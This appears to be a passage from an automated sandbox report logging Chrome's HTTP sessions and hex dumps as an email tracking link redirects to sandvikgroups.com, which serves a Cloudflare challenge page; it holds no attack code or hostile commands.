                                        2025-01-07 21:05:54 UTC1369INData Raw: 4f 22 2c 6d 64 72 64 3a 20 22 4a 34 39 31 59 35 51 67 31 6e 65 38 6e 52 58 63 6b 6d 30 64 74 46 5a 45 4d 72 35 6a 77 79 31 57 46 2e 77 61 44 6e 6a 55 44 49 55 2d 31 37 33 36 32 38 33 39 35 34 2d 31 2e 32 2e 31 2e 31 2d 78 4c 6b 33 61 75 68 54 65 2e 74 4e 48 76 58 78 67 37 71 45 4e 71 6e 64 6d 48 38 6f 41 6b 74 67 6b 32 62 54 51 2e 5f 35 2e 6e 30 69 6b 6b 76 6e 43 72 57 67 75 51 42 47 77 4d 56 74 75 43 5f 66 65 68 62 31 6a 50 79 48 6f 4d 67 68 72 6c 7a 43 56 72 49 6f 6c 32 62 76 4a 4c 68 4e 31 4f 6e 39 6b 37 70 55 59 31 31 71 4f 34 35 67 39 64 6a 33 6d 34 6d 6d 6f 6c 61 4e 5f 69 66 6b 34 66 69 73 68 4e 49 35 61 62 65 4f 66 68 70 42 2e 43 4e 69 66 65 31 4f 39 52 33 41 68 5f 4a 79 39 56 78 32 66 4e 4a 6c 2e 41 78 50 63 4b 61 39 51 56 50 63 65 54 47 73 53 6b
                                        Data Ascii: O",mdrd: "J491Y5Qg1ne8nRXckm0dtFZEMr5jwy1WF.waDnjUDIU-1736283954-1.2.1.1-xLk3auhTe.tNHvXxg7qENqndmH8oAktgk2bTQ._5.n0ikkvnCrWguQBGwMVtuC_fehb1jPyHoMghrlzCVrIol2bvJLhN1On9k7pUY11qO45g9dj3m4mmolaN_ifk4fishNI5abeOfhpB.CNife1O9R3Ah_Jy9Vx2fNJl.AxPcKa9QVPceTGsSk
                                        2025-01-07 21:05:54 UTC1369INData Raw: 71 52 34 55 62 43 4c 51 45 64 47 6d 6c 61 68 39 4c 4d 73 50 4e 43 6a 2e 41 49 32 4a 45 42 48 52 79 55 54 53 53 57 58 41 4a 71 78 67 48 71 2e 5a 73 64 42 54 2e 35 70 6c 51 49 2e 59 4a 45 46 44 70 59 73 38 36 30 2e 50 5f 48 72 7a 70 6c 74 4b 52 5a 57 6e 66 56 4c 42 4e 31 65 2e 59 54 63 32 59 51 61 57 31 74 31 44 34 47 6e 51 33 70 73 72 4a 50 6f 6e 34 5a 33 78 45 72 42 6c 59 4c 63 62 43 4d 69 31 44 42 39 72 7a 69 71 70 6c 58 67 7a 54 6f 4f 70 76 55 63 41 31 69 6e 50 42 41 74 45 31 69 6f 46 76 44 48 4c 31 41 72 33 6a 55 4f 44 48 75 69 41 43 39 4e 65 45 52 35 6b 37 78 46 53 65 4d 62 34 6f 4f 5f 6a 69 37 64 66 65 39 77 7a 37 76 73 47 34 58 59 4b 68 69 47 68 6a 30 4d 4b 6e 79 2e 59 46 64 70 2e 53 5f 4a 5a 74 49 71 67 47 6d 33 37 56 5f 41 47 70 63 53 6b 30 77 66
                                        Data Ascii: qR4UbCLQEdGmlah9LMsPNCj.AI2JEBHRyUTSSWXAJqxgHq.ZsdBT.5plQI.YJEFDpYs860.P_HrzpltKRZWnfVLBN1e.YTc2YQaW1t1D4GnQ3psrJPon4Z3xErBlYLcbCMi1DB9rziqplXgzToOpvUcA1inPBAtE1ioFvDHL1Ar3jUODHuiAC9NeER5k7xFSeMb4oO_ji7dfe9wz7vsG4XYKhiGhj0MKny.YFdp.S_JZtIqgGm37V_AGpcSk0wf
                                        2025-01-07 21:05:54 UTC1005INData Raw: 33 44 48 73 78 75 54 78 6e 41 43 59 4a 45 6d 67 66 73 53 6f 32 4b 34 41 45 71 49 47 4d 68 46 4b 74 44 78 65 66 4e 7a 52 50 56 6b 38 50 46 43 63 6a 62 4b 54 65 71 72 4a 4a 6e 32 51 4d 32 31 57 43 49 52 39 6e 70 66 77 47 39 30 42 34 75 49 65 61 33 66 41 2e 41 4e 22 7d 3b 76 61 72 20 63 70 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 63 70 6f 2e 73 72 63 20 3d 20 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 67 2f 6f 72 63 68 65 73 74 72 61 74 65 2f 63 68 6c 5f 70 61 67 65 2f 76 31 3f 72 61 79 3d 38 66 65 36 65 38 39 62 31 66 64 34 34 33 36 37 27 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 20 3d 20 6c 6f 63
                                        Data Ascii: 3DHsxuTxnACYJEmgfsSo2K4AEqIGMhFKtDxefNzRPVk8PFCcjbKTeqrJJn2QM21WCIR9npfwG90B4uIea3fA.AN"};var cpo = document.createElement('script');cpo.src = '/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8fe6e89b1fd44367';window._cf_chl_opt.cOgUHash = loc
                                        2025-01-07 21:05:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.449745104.17.203.314435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:54 UTC1003OUTGET /lt.php?x=3DZy~GE4V3Sh78B__Q9GUuBs1XzUv_D1ke04YXLDKXmbEs370Ey.yuJz5X6lmNI~jusw HTTP/1.1
                                        Host: juddshaw.activehosted.com
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: PHPSESSID=2fecf0125781b33d31f64d2ffcd6cd91; cmp652497115=8d0b7ede170208f0b44e002e53875116; __cf_bm=UUUeLQDQdlijINbz4dlpy64aILUWtnS_rwpD8HZJA9M-1736283953-1.0.1.1-Ey17XGAkkE89fHbEIfnxM87SHKRpyukEmmHNwNL11pS_uFwxoQF4dZ7JLqjE4SFMqJouRqeF3aonlEBvwtp8gw
                                        2025-01-07 21:05:55 UTC652INHTTP/1.1 302 Found
                                        Date: Tue, 07 Jan 2025 21:05:55 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: close
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Location: https://sandvikgroups.com/?cono
                                        Pragma: no-cache
                                        X-Content-Type-Options: nosniff
                                        X-Privacy-Policy: You can find our privacy policy here: https://www.activecampaign.com/help/privacy-policy/
                                        X-Request-Id: 3db7862e1d3daecdd3da63c07758c713
                                        X-Robots-Tag: noindex
                                        CF-Cache-Status: DYNAMIC
                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                        Server: cloudflare
                                        CF-RAY: 8fe6e89ee9c67cff-EWR


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.44974635.190.80.14435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:54 UTC550OUTOPTIONS /report/v4?s=Pcg0o7Kj%2BRkdhhdLWX7U%2FtWVUL0wE8V1fG%2B7rp0VJrVdm01Fx%2BDD3F%2BiEeMtvmJ7tS8NOzIvP7o699TKmJFcbU7fjLyDKyfbHddhSmuvPjvQ5MYJj7BnZZuHIAMRVv7NzbE%2FpA%3D%3D HTTP/1.1
                                        Host: a.nel.cloudflare.com
                                        Connection: keep-alive
                                        Origin: https://sandvikgroups.com
                                        Access-Control-Request-Method: POST
                                        Access-Control-Request-Headers: content-type
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:55 UTC336INHTTP/1.1 200 OK
                                        Content-Length: 0
                                        access-control-max-age: 86400
                                        access-control-allow-methods: POST, OPTIONS
                                        access-control-allow-origin: *
                                        access-control-allow-headers: content-length, content-type
                                        date: Tue, 07 Jan 2025 21:05:55 GMT
                                        Via: 1.1 google
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.44974735.190.80.14435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:55 UTC490OUTPOST /report/v4?s=Pcg0o7Kj%2BRkdhhdLWX7U%2FtWVUL0wE8V1fG%2B7rp0VJrVdm01Fx%2BDD3F%2BiEeMtvmJ7tS8NOzIvP7o699TKmJFcbU7fjLyDKyfbHddhSmuvPjvQ5MYJj7BnZZuHIAMRVv7NzbE%2FpA%3D%3D HTTP/1.1
                                        Host: a.nel.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 392
                                        Content-Type: application/reports+json
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:55 UTC392OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 39 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 61 6e 64 76 69 6b 67 72 6f 75 70 73 2e 63 6f
                                        Data Ascii: [{"age":3,"body":{"elapsed_time":1095,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":403,"type":"http.error"},"type":"network-error","url":"https://sandvikgroups.co
                                        2025-01-07 21:05:55 UTC168INHTTP/1.1 200 OK
                                        Content-Length: 0
                                        date: Tue, 07 Jan 2025 21:05:55 GMT
                                        Via: 1.1 google
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.449749188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:56 UTC937OUTGET /?cono HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-platform: "Windows"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:05:56 UTC1285INHTTP/1.1 403 Forbidden
                                        Date: Tue, 07 Jan 2025 21:05:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Resource-Policy: same-origin
                                        Origin-Agent-Cluster: ?1
                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                        Referrer-Policy: same-origin
                                        X-Content-Options: nosniff
                                        X-Frame-Options: SAMEORIGIN
                                        cf-mitigated: challenge
                                        2025-01-07 21:05:56 UTC959INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 38 2f 55 32 36 4e 49 30 4b 76 76 49 5a 54 4a 55 39 6e 2f 4a 53 74 63 4e 41 55 64 66 35 68 38 6c 45 61 4a 6b 4b 6a 31 38 76 5a 51 33 6e 50 32 4a 52 30 71 4d 66 6d 69 77 47 41 64 4a 68 43 53 46 6e 69 51 39 37 2b 50 34 59 6d 4d 44 4a 49 4c 43 43 6c 50 64 44 62 7a 75 78 35 2f 51 5a 30 52 77 72 34 62 44 2b 46 50 46 66 70 4d 38 68 31 68 57 42 33 76 6f 45 59 78 39 30 6e 38 76 36 56 6b 6e 30 7a 31 4e 62 4e 58 43 45 6c 4b 62 70 79 4e 58 2b 73 62 4a 48 51 3d 3d 24 33 71 4b 6b 77 79 54 54 4d 35 6a 41 50 34 6b 35 4a 52 63 46 52 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                        Data Ascii: cf-chl-out: 8/U26NI0KvvIZTJU9n/JStcNAUdf5h8lEaJkKj18vZQ3nP2JR0qMfmiwGAdJhCSFniQ97+P4YmMDJILCClPdDbzux5/QZ0Rwr4bD+FPFfpM8h1hWB3voEYx90n8v6Vkn0z1NbNXCElKbpyNX+sbJHQ==$3qKkwyTTM5jAP4k5JRcFRg==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                        2025-01-07 21:05:56 UTC1369INData Raw: 32 31 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                        Data Ascii: 2137<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                        2025-01-07 21:05:56 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                        Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                        2025-01-07 21:05:56 UTC1369INData Raw: 59 49 6f 4d 71 39 6e 4d 6f 71 78 78 46 7a 74 57 7a 76 56 55 34 70 75 41 52 46 43 51 50 58 41 69 48 31 61 4d 44 30 59 31 6d 70 73 5a 4a 68 75 64 6f 78 5a 30 37 43 64 6a 46 55 38 64 6f 62 38 4d 6a 48 55 66 5a 4a 69 6a 4f 4b 6d 42 62 35 49 39 43 43 46 63 62 65 35 48 69 43 75 6c 58 61 58 4f 54 6a 33 4a 42 36 67 5a 78 4b 77 61 69 52 45 41 53 2e 57 77 73 48 46 52 50 52 43 6d 42 32 38 6f 4a 50 63 6f 67 33 73 58 72 69 31 4e 4e 49 52 66 73 6d 34 59 74 41 38 31 52 74 5f 39 33 38 6c 37 41 48 6a 65 61 33 56 48 78 45 70 55 5a 6d 66 30 4c 61 72 7a 7a 31 67 73 53 4d 6a 7a 43 36 5f 33 34 54 75 72 64 4b 78 41 30 39 39 53 63 47 38 61 43 34 6f 6f 51 45 79 52 43 2e 65 77 4b 5a 6e 43 74 63 58 73 6d 4b 36 78 5f 30 4e 4e 78 30 6f 55 6b 49 59 44 54 50 63 58 6d 44 43 52 43 74 71
                                        Data Ascii: YIoMq9nMoqxxFztWzvVU4puARFCQPXAiH1aMD0Y1mpsZJhudoxZ07CdjFU8dob8MjHUfZJijOKmBb5I9CCFcbe5HiCulXaXOTj3JB6gZxKwaiREAS.WwsHFRPRCmB28oJPcog3sXri1NNIRfsm4YtA81Rt_938l7AHjea3VHxEpUZmf0Larzz1gsSMjzC6_34TurdKxA099ScG8aC4ooQEyRC.ewKZnCtcXsmK6x_0NNx0oUkIYDTPcXmDCRCtq
                                        2025-01-07 21:05:56 UTC1369INData Raw: 34 38 6f 78 44 38 59 6d 42 69 59 54 47 4e 79 54 79 33 70 63 6a 6a 4c 4e 35 31 6e 6d 38 32 6b 35 48 36 4d 72 57 47 69 69 4c 69 72 6b 70 7a 77 41 46 31 48 69 6c 4d 6e 56 4d 57 65 7a 65 6e 46 4f 53 53 70 59 62 38 32 36 42 47 67 45 31 77 73 7a 71 50 7a 35 68 38 74 32 2e 6d 65 6c 76 32 31 78 35 31 4a 4c 52 6c 36 77 67 5f 72 45 79 78 6f 57 79 36 73 35 33 67 31 44 78 6b 4d 70 4f 73 69 62 78 41 45 67 6b 51 5f 6a 69 4b 52 46 48 56 33 45 4d 50 74 71 56 69 46 49 45 67 67 70 57 53 42 57 33 42 30 6b 4e 5f 69 51 63 59 69 45 71 47 6a 36 4c 67 48 78 68 43 49 70 6b 6e 37 74 41 54 57 52 6b 64 61 4e 6a 36 55 45 6d 4d 6e 32 6f 34 64 48 5a 31 6e 77 2e 4c 66 44 50 6e 55 6a 5f 6f 31 50 79 4a 31 76 34 56 67 76 53 33 74 53 71 33 62 37 42 71 50 42 4d 48 6f 50 66 6b 42 31 68 48 37
                                        Data Ascii: 48oxD8YmBiYTGNyTy3pcjjLN51nm82k5H6MrWGiiLirkpzwAF1HilMnVMWezenFOSSpYb826BGgE1wszqPz5h8t2.melv21x51JLRl6wg_rEyxoWy6s53g1DxkMpOsibxAEgkQ_jiKRFHV3EMPtqViFIEggpWSBW3B0kN_iQcYiEqGj6LgHxhCIpkn7tATWRkdaNj6UEmMn2o4dHZ1nw.LfDPnUj_o1PyJ1v4VgvS3tSq3b7BqPBMHoPfkB1hH7
                                        2025-01-07 21:05:56 UTC1369INData Raw: 79 76 49 75 34 72 56 46 35 66 6f 31 76 48 72 58 56 68 77 52 56 32 5a 5f 41 30 4b 6e 34 64 30 50 36 35 37 77 30 5a 7a 42 42 4a 63 6e 48 51 4e 64 72 53 42 5f 70 64 69 67 70 68 61 4b 6b 47 39 52 6e 6f 77 73 47 70 62 4e 76 72 48 4f 44 46 30 6f 2e 52 36 31 39 5f 78 2e 42 4e 4f 43 45 33 67 69 49 65 59 35 70 58 73 70 56 35 65 69 4a 49 4e 67 64 52 6b 31 7a 52 6e 61 76 5a 31 6c 63 41 68 7a 4e 50 79 75 36 65 4c 65 35 2e 52 4b 66 73 65 47 5f 42 50 4e 58 58 77 70 74 72 54 79 50 35 74 71 66 73 72 53 61 45 71 67 70 34 36 68 45 51 51 7a 70 70 78 52 33 5a 7a 77 77 50 6e 65 4f 50 39 61 4c 66 31 77 53 34 6b 4f 4a 56 68 77 48 5f 76 46 71 49 43 4d 71 30 37 6f 59 42 4d 4f 4d 45 6b 6c 70 6a 6e 51 6c 76 73 57 38 57 51 52 46 52 63 73 4b 59 74 46 35 5a 39 6e 77 6e 6b 48 61 47 61
                                        Data Ascii: yvIu4rVF5fo1vHrXVhwRV2Z_A0Kn4d0P657w0ZzBBJcnHQNdrSB_pdigphaKkG9RnowsGpbNvrHODF0o.R619_x.BNOCE3giIeY5pXspV5eiJINgdRk1zRnavZ1lcAhzNPyu6eLe5.RKfseG_BPNXXwptrTyP5tqfsrSaEqgp46hEQQzppxR3ZzwwPneOP9aLf1wS4kOJVhwH_vFqICMq07oYBMOMEklpjnQlvsW8WQRFRcsKYtF5Z9nwnkHaGa
                                        2025-01-07 21:05:56 UTC1369INData Raw: 77 38 6f 45 6f 57 4b 65 37 34 6e 4f 6a 75 4a 74 48 30 6e 45 36 63 72 6c 52 48 4e 39 63 77 46 56 32 30 6f 45 46 75 4d 63 4a 49 4c 75 39 71 68 49 69 5a 67 65 4b 30 49 49 58 76 6d 35 6f 58 52 7a 56 56 69 49 30 39 36 42 49 2e 78 32 52 35 75 31 76 6a 76 34 4e 69 37 53 33 4a 45 6c 61 6c 53 4f 45 68 7a 49 65 54 39 65 46 63 62 2e 58 4d 30 42 6c 63 35 6e 73 6e 59 57 37 75 70 68 63 49 6d 53 4f 65 74 46 67 4f 43 73 61 4b 4d 57 54 39 6f 6d 5a 6b 46 36 7a 4d 4d 52 55 72 68 76 35 74 4e 74 6c 56 7a 46 4c 34 42 35 51 64 55 46 75 4e 63 62 2e 71 74 45 6c 36 2e 6d 4f 7a 62 4d 44 39 79 6f 30 39 70 38 46 6c 59 45 39 61 6c 46 48 4f 46 30 45 57 78 36 71 6f 45 6c 76 39 77 42 55 62 7a 6d 4c 74 64 6d 46 39 7a 32 33 38 51 6c 34 72 4d 51 46 45 59 58 4f 51 79 38 74 6e 69 6d 72 2e 4e
                                        Data Ascii: w8oEoWKe74nOjuJtH0nE6crlRHN9cwFV20oEFuMcJILu9qhIiZgeK0IIXvm5oXRzVViI096BI.x2R5u1vjv4Ni7S3JElalSOEhzIeT9eFcb.XM0Blc5nsnYW7uphcImSOetFgOCsaKMWT9omZkF6zMMRUrhv5tNtlVzFL4B5QdUFuNcb.qtEl6.mOzbMD9yo09p8FlYE9alFHOF0EWx6qoElv9wBUbzmLtdmF9z238Ql4rMQFEYXOQy8tnimr.N
                                        2025-01-07 21:05:56 UTC297INData Raw: 74 5f 74 6b 3d 6e 55 57 6f 4f 65 78 46 62 74 79 5a 59 76 6b 65 59 37 32 4a 67 41 74 61 68 57 6b 33 66 66 63 52 4e 79 75 78 7a 74 71 31 4b 78 30 2d 31 37 33 36 32 38 33 39 35 36 2d 31 2e 30 2e 31 2e 31 2d 4c 6b 63 6c 50 57 79 59 52 72 76 52 42 78 43 76 67 6c 6e 31 32 53 69 75 53 4e 56 74 45 45 47 77 61 61 73 4d 4b 30 4f 69 4d 70 45 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 7d 7d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e
                                        Data Ascii: t_tk=nUWoOexFbtyZYvkeY72JgAtahWk3ffcRNyuxztq1Kx0-1736283956-1.0.1.1-LkclPWyYRrvRBxCvgln12SiuSNVtEEGwaasMK0OiMpE" + window._cf_chl_opt.cOgUHash);cpo.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appen
                                        2025-01-07 21:05:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.449751188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:05:57 UTC993OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8fe6e8a6e884443e HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://sandvikgroups.com/?cono&__cf_chl_rt_tk=nUWoOexFbtyZYvkeY72JgAtahWk3ffcRNyuxztq1Kx0-1736283956-1.0.1.1-LkclPWyYRrvRBxCvgln12SiuSNVtEEGwaasMK0OiMpE
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
